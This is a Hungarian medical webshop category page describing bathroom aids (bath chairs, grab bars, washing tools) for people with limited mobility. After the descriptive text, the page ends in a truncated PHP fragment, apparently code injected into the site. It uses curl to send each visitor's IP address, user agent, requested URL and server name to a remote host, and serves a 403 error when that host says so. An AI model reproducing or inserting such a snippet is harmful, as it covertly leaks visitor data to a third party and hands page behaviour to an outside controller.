CIB bankkártyás fizetés

Szállítás. átvétel

Házhozszálíláts futrászolgálattal (GLS, SPRINTER)

FOXPOST Parcel locker

Fogyasztó Barát

TOP termékek

Gyógyászfutár Gyógyászati webáruház

E-mail: [admin@gyogyaszfutar.hu]   
(Kérjük kérdését elsősorban írásban tegy fel, vevőszolgálatunk a lehető leggyorsabban válaszol a levelekre)

A feltüntetett árak kizárólag a webáruházban leadott rendelések esetén érvényesek! 

Fürdőszobai eszközök, higiénia

A fürdőszoba a ház egyik legfontosabb helyisége, de betegek számára akadályokat is jelenthet. Azok számára, akik korlátozott mozgásképességgel rendelkeznek, nehézséget okozhat a fürdőszobában való mozgás, az önálló tisztálkodás és fürdés. A fürdető székek, fürdőszoba kapaszkodók és tisztálkodást segítő eszközök lehetővé teszik, hogy a betegek könnyebben és biztonságosabban használják a fürdőszobát.

A fürdető székek széles körben elérhetők a piacon és többféle változatban kaphatók. A legtöbb fürdető szék alacsonyan helyezkedik el, így megkönnyíti a mozgáskorlátozott emberek számára a fürdés közbeni ülését és felállását. A fürdőszoba kapaszkodók segítségével a betegek biztonságosan mozoghatnak a fürdőszobában, anélkül hogy aggodalmuk lenne a kiegyensúlyozottságuk miatt. Ezek a kapaszkodók a falra vagy a zuhanyzóra rögzítve stabil támogatást nyújtanak a felkeléshez és leüléshez.

A tisztálkodást segítő eszközök segítenek a betegeknek, hogy önállóan tisztálkodhassanak a fürdőszobában. Az ilyen eszközök közé tartoznak a hajmosó tálcák, a hátmosó kefék és a hosszú fogantyús szivacsok. Ezek az eszközök megkönnyítik a betegek számára a tisztálkodást, miközben csökkentik az esetleges sérülések kockázatát.

Összességében, a fürdőszobai fürdető székek, fürdőszoba kapaszkodók és tisztálkodást segítő eszközök azért készülnek, hogy megkönnyítsék az életet a korlátozott mozgásképességgel rendelkező emberek számára. Ezek az eszközök segítenek a betegeknek biztonságosan és kényelmesen használni a fürdőszobát, és megtartani az önállóságukat az otthonukban.

Tovább
 
true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>